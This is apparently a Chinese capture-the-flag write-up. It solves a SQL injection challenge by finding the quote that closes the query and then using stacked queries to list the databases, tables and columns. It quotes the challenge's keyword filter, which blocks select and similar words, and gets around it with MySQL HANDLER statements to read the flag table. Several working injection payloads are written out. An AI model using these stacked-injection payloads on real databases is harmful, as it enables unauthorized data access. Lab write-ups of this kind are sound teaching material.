打开题目,看到是
应该又是sql注入,开始进行判断闭合符号,输入'发现出现。
那么闭合符号大概率就是 ' 了
解这尝试了正常解法,发现都不能解出。之后尝试使用堆叠。
输入
1';show databases;
出现
那么使用来查询都有哪些表
1';show tables;
发现有FlagHere,flag大概率在这里,之后使用
1';show columns from FlagHere;
出现
flag果然在这里,之后再使用
1';select * fron FlagHere;
来找flag字段值,但是出现了
return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
看来把很多东西都过滤了。
之后使用AI来搜寻可以实现与select相同作用的命令,找到了一个名为HANDLER的命令
之后将这几条语句进行堆叠,成功得到flag。
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;
以下我总结了一篇关于HANDLER命令使用的文章,有兴趣的可以看一下